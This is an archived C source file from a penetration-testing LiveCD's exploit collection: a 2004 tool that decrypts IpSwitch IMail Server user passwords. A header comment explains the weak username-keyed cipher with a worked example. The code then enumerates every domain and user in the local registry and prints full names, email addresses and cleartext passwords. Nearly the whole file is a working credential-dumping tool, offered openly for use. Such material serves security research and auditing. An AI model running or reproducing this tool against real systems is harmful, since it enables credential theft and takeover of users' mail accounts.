home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / imail / Imailpwdump.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  14KB  |  321 lines

---

1. /*************************************************************************************************
2. *       IpSwitch IMail Server <= ver 8.1 User Password Decryption
3. *
4. *       by Adik < netmaniac[at]hotmail.KG >
5. *
6. *       IpSwitch IMail Server uses weak encryption algorithm to encrypt its user passwords. It uses
7. *       polyalphabetic Vegenere cipher to encrypt its user passwords. This encryption scheme is
8. *       relatively easy to break. In order to decrypt user password we need a key. IMail uses username
9. *       as a key to encrypt its user passwords. The server stores user passwords in the registry under the key
10. *       "HKEY_LOCAL_MACHINE\SOFTWARE\IpSwitch\IMail\Domains\<domainname>\Users\<username>\Password".
11. *       Before decrypting password convert all upper case characters in the username to lower case
12. *       characters. We use username as a key to decrypt our password.
13. *       In order to get our plain text password, we do as follows:
14. *       1) Subtract hex code of first password hash character by the hex code of first username character.
15. *          The resulting hex code will be our first decrypted password character.
16. *       2) Repeat above step for the rest of the chars.
17. *
18. *       Look below, everythin is dead simple ;)
19. *       eg:
20. *
21. *       USERNAME:               netmaniac
22. *       PASSWORDHASH:   D0CEE7D5CCD3D4C7D2E0CAEAD2D3
23. *       --------------------------------------------
24. *
25. *       D0 CE E7 D5 CC D3 D4 C7 D2 E0 CA EA D2 D3       <- password hash
26. * -     6E 65 74 6D 61 6E 69 61 63 6E 65 74 6D 61       <- hex codes of username
27. *       n  e  t  m  a  n  i  a  c  n  e  t  m  a        <- username is a key
28. *       -----------------------------------------
29. *       62 69 73 68 6B 65 6B 66 6F 72 65 76 65 72       <- hex codes of decrypted password
30. *       b  i  s  h  k  e  k  f  o  r  e  v  e  r        <- actual decrypted password
31. *
32. *
33. *       pwdhash_hex_code                username_hex_code               decrypted_password
34. *       ------------------------------------------------------------------
35. *                       D0                      -               6E (n)                  =       62 (b)
36. *                       CE                      -               65 (e)                  =       69 (i)
37. *                       E7                      -               74 (t)                  =       73 (s)
38. *                       D5                      -               6D (m)                  =       68 (h)
39. *                       CC                      -               61 (a)                  =       6B (k)
40. *                       D3                      -               6E (n)                  =       65 (e)
41. *                       D4                      -               69 (i)                  =       6B (k)
42. *                       C7                      -               61 (a)                  =       66 (f)
43. *                       D2                      -               63 (c)                  =       6F (o)
44. *                       E0                      -               6E (n)                  =       72 (r)
45. *                       CA                      -               65 (e)                  =       65 (e)
46. *                       EA                      -               74 (t)                  =       76 (v)
47. *                       D2                      -               6D (m)                  =       65 (e)
48. *                       D3                      -               61 (a)                  =       72 (r)
49. *       ------------------------------------------------------------------
50. *
51. *       I've included a lil proggie to dump all the usernames/passwords from local machine's registry.
52. *       Have fun!
53. *       //Send bug reports to netmaniac[at]hotmail.KG
54. *
55. *       Greets to: my man wintie from .au, Chintan Trivedi :), jin yean ;), Morphique
56. *
57. *       [16/August/2004] Bishkek
58. **************************************************************************************************/
59.  
60.  
61. //#include "stdafx.h"
62. #include <stdio.h>
63. #include <stdlib.h>
64. #include <string.h>
65. #include <ctype.h>
66. #include <windows.h>
67. #define snprintf        _snprintf
68. #pragma comment(lib,"advapi32")
69. #define ALLOWED_USERNAME_CHARS  "A-Z,a-z,0-9,-,_,."
70. #define MAX_NUM 1024 //500
71. #define DOMAINZ "Software\\IpSwitch\\IMail\\Domains"
72. #define VER     "1.1"
73. #define MAXSIZE 100
74.  
75. int total_accs=0;
76. int total_domainz=0,total_domain_accs=0;
77. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
78. void greetz()
79. {
80.         printf( "\n\t--= [ IpSwitch IMail Server User Password Decrypter ver %s] =--\n\n"
81.                         "\t\t (c) 2004 by Adik ( netmaniac [at] hotmail.KG )\n\n\n",VER);
82. }
83. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
84. void usage()
85. {
86.         printf( "------------------------------------------------------------------------\n");
87.         printf( " Imailpwdump [-d] -- Dumps IMail Server user/pwds from local registry\n\n"
88.                         " Imailpwdump [username] [passwordhash] -- User/PwdHash to decrypt\n\n"
89.                         " eg: Imailpwdump netmaniac D0CEE7D5CCD3D4C7D2E0CAEAD2D3\n");
90.         printf( "------------------------------------------------------------------------\n");
91.  
92. }
93. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
94. void str2hex(char *hexstring, char *outbuff)
95. {
96.         unsigned long tmp=0;
97.         char tmpchr[5]="";
98.         memset(outbuff,0,strlen(outbuff));
99.         if(strlen(hexstring) % 2)
100.         {
101.                 printf(" Incorrect password hash!\n");
102.                 exit(1);
103.         }
104.         if(strlen(hexstring)>MAXSIZE)
105.         {
106.                 printf(" Password hash is too long! \n");
107.                 exit(1);
108.         }
109.         for(unsigned int i=0, c=0; i<strlen(hexstring); i+=2, c++)
110.         {
111.                 memcpy(tmpchr,hexstring+i,2);
112.                 tmp = strtoul(tmpchr,NULL,16);
113.                 outbuff[c] = (char)tmp;
114.         }
115. }
116. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
117. void str2smallcase(char *input)
118. {
119.         if(strlen(input)>MAXSIZE)
120.         {
121.                 printf(" Username too long! \n");
122.                 return;
123.         }
124.         for(unsigned int i=0;i<strlen(input);i++)
125.         {
126.                 if(isalnum(input[i]) || input[i] == '-' || input[i]=='_' || input[i]=='.')
127.                         input[i] = tolower(input[i]);
128.                 else
129.                 {
130.                         printf(" Bad characters in username!\n Allowed characters: %s\n",ALLOWED_USERNAME_CHARS);
131.                         return;
132.                 }
133.         }
134. }
135. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
136. void populate(char *input,unsigned int size)
137. {
138.         char tmp[MAX_NUM]="";
139.         unsigned int strl = strlen(input);
140.         strcpy(tmp,input);
141.         //netmaniacnetmaniacnetman
142.         for(unsigned int i=strlen(input),c=0;i<size;i++,c++)
143.         {
144.                 if(c==strl)
145.                         c=0;
146.                 input[i] = tmp[c];
147.         }
148.         input[i]='\0';
149. }
150. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
151. void imail_decrypt(char *username, char *pwdhash,char *outbuff)
152. {
153.         //adik 123456
154.         //adikbek 123
155.         if(strlen(pwdhash) <= strlen(username) )
156.         {
157.                 memset(outbuff,0,sizeof(outbuff));
158.                 for(unsigned int i=0;i<strlen(pwdhash);i++)
159.                         outbuff[i] = (pwdhash[i]&0xff) - (username[i]&0xff);
160.                 outbuff[i]='\0';
161.         }
162. }
163. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
164. void get_usr_pwds(char *subkey,char *usr)
165. {
166.         long res;
167.         HKEY hPwdKey;
168.         char username[MAXSIZE]="";
169.         char passwdhash[MAXSIZE*2]="", passwd[MAXSIZE]="",clearpasswd[MAXSIZE]="";
170.         char fullname[MAXSIZE]="";
171.         char email[MAXSIZE]="";
172.         DWORD lType;
173.         DWORD passwdhashsz=sizeof(passwdhash)-1,fullnamesz=MAXSIZE-1,emailsz=MAXSIZE-1;
174.  
175.                 res = RegOpenKeyEx(HKEY_LOCAL_MACHINE,subkey,0,KEY_ALL_ACCESS,&hPwdKey);
176.                 if(res!=ERROR_SUCCESS)
177.                 {
178.                         printf(" Error opening key %s! Error #:%d\n",subkey,res);
179.                         exit(1);
180.                         //return;
181.                 }
182.  
183.                 if(RegQueryValueEx(hPwdKey,"Password",0,&lType,(LPBYTE)passwdhash,&passwdhashsz)!= ERROR_SUCCESS)
184.                 {
185.                         RegCloseKey(hPwdKey);
186.                         return;
187.                 }
188.                 if(RegQueryValueEx(hPwdKey,"FullName",0,&lType,(LPBYTE)fullname,&fullnamesz)!= ERROR_SUCCESS)
189.                 {
190.                         RegCloseKey(hPwdKey);
191.                         return;
192.                 }
193.                 if(RegQueryValueEx(hPwdKey,"MailAddr",0,&lType,(LPBYTE)email,&emailsz)!=ERROR_SUCCESS)
194.                 {
195.                         RegCloseKey(hPwdKey);
196.                         return;
197.                 }
198.  
199.  
200.                 str2smallcase(usr);
201.                 strncpy(username,usr,sizeof(username)-1);
202.                 str2hex(passwdhash,passwd);
203.                 // adik 1234567
204.                 // adik 12
205.                 if(strlen(passwd)>strlen(username))
206.                         populate(username,strlen(passwd));
207.                 imail_decrypt(username,passwd,clearpasswd);
208.  
209.                 printf( "------------------------------------------------------------------------\n"
210.                                 " FullName:\t %s\n"
211.                                 " Email:\t\t %s\n"
212.                                 " Username:\t %s\n"
213.                                 " Password:\t %s\n",
214.                                 fullname,email,usr,clearpasswd);
215.         total_accs++;
216.         RegCloseKey(hPwdKey);
217. }
218. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
219. void dump_registry_pwds()
220. {
221.         HKEY hKey,hUserKey;
222.         DWORD domRes=0,usrRes=0, domlen=0,userlen=0,domIndex=0,userIndex=0;
223.         FILETIME ftime;
224.         char domain[150]="";
225.         char user[150]="";
226.         char tmpbuff[MAX_NUM]="";
227.         char usrtmpbuff[MAX_NUM]="";
228.         domRes = RegOpenKeyEx(HKEY_LOCAL_MACHINE,DOMAINZ,0,KEY_ALL_ACCESS,&hKey);
229.         if(domRes!=ERROR_SUCCESS)
230.         {
231.                 printf(" Error opening key '%s'!\n IMail not installed?? Error #:%d\n",DOMAINZ,domRes);
232.                 exit(1);
233.         }
234.         do
235.         {
236.                 domlen=sizeof(domain)-1;
237.                 domRes=RegEnumKeyEx(hKey,domIndex,domain,&domlen,NULL,NULL,NULL,&ftime);
238.                 if(domRes!=ERROR_NO_MORE_ITEMS)
239.                 {
240.                         printf("\n DOMAIN:\t [ %s ]\n",domain);
241.                         userIndex=0;
242.                         total_accs=0;
243.                         snprintf(tmpbuff,sizeof(tmpbuff)-1,"%s\\%s\\Users",DOMAINZ,domain);
244.                         usrRes = RegOpenKeyEx(HKEY_LOCAL_MACHINE,tmpbuff,0,KEY_ALL_ACCESS,&hUserKey);
245.                         if(usrRes==ERROR_SUCCESS)
246.                         {
247.                                 //adik
248.                                 do
249.                                 {
250.                                         userlen=sizeof(user)-1;
251.                                         usrRes=RegEnumKeyEx(hUserKey,userIndex,user,&userlen,NULL,NULL,NULL,&ftime);
252.                                         if(usrRes!=ERROR_NO_MORE_ITEMS)
253.                                         {
254.                                                 snprintf(usrtmpbuff,sizeof(usrtmpbuff)-1,"%s\\%s\\Users\\%s",DOMAINZ,domain,user);
255.                                                 get_usr_pwds(usrtmpbuff,user);
256.                                         }
257.                                         userIndex++;
258.                                 }
259.                                 while(usrRes!=ERROR_NO_MORE_ITEMS);
260.                                 RegCloseKey(hUserKey);
261.                                 printf("\n\t Total:\t %d Accounts\n",total_accs);
262.                                 total_domain_accs += total_accs;
263.                                 total_domainz++;
264.                         }
265.                         domIndex++;
266.                 }
267.         }
268.         while(domRes != ERROR_NO_MORE_ITEMS);
269.         RegCloseKey(hKey);
270.         //total_domains += dom
271.         printf("\n Total:\t %d Domains, %d Accounts\n",total_domainz,total_domain_accs);
272.  
273. }
274. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
275. void decrypt_usr_pass(char *usr,char *passwd)
276. {
277.         char username[MAX_NUM]="";
278.         char passwordhash[MAX_NUM]="";
279.         char outputbuff[250]="";
280.  
281.         str2smallcase(usr);
282.         strncpy(username,usr,sizeof(username)-1);
283.         str2hex(passwd,passwordhash);
284.         printf("------------------------------------------------------------------------\n");
285.         printf( " Username:\t\t %s\n"
286.                         " Passwordhash:\t\t %s\n",usr,passwd);
287.         if(strlen(passwordhash)>strlen(username))
288.                 populate(username,strlen(passwordhash));
289.  
290.         imail_decrypt(username,passwordhash,outputbuff);
291.         printf(" Decrypted passwd:\t %s\n",outputbuff);
292.         printf("------------------------------------------------------------------------\n");
293. }
294. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
295. void main(int argc, char *argv[])
296. {
297.         greetz();
298.  
299.         if(argc ==2 && strncmp(argv[1],"-d",2)==0 )
300.         {
301.                 //dump passwd from registry
302.                 dump_registry_pwds();
303.         }
304.         else if(argc == 3 && strncmp(argv[1],"-d",2)!=0)
305.         {
306.                 //decrypt username passwd
307.                 decrypt_usr_pass(argv[1],argv[2]);
308.         }
309.         else
310.         {
311.                 usage();
312.                 return;
313.         }
314.  
315.         // ThE eNd
316.  
317. }
318. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
319.  
320.  
321.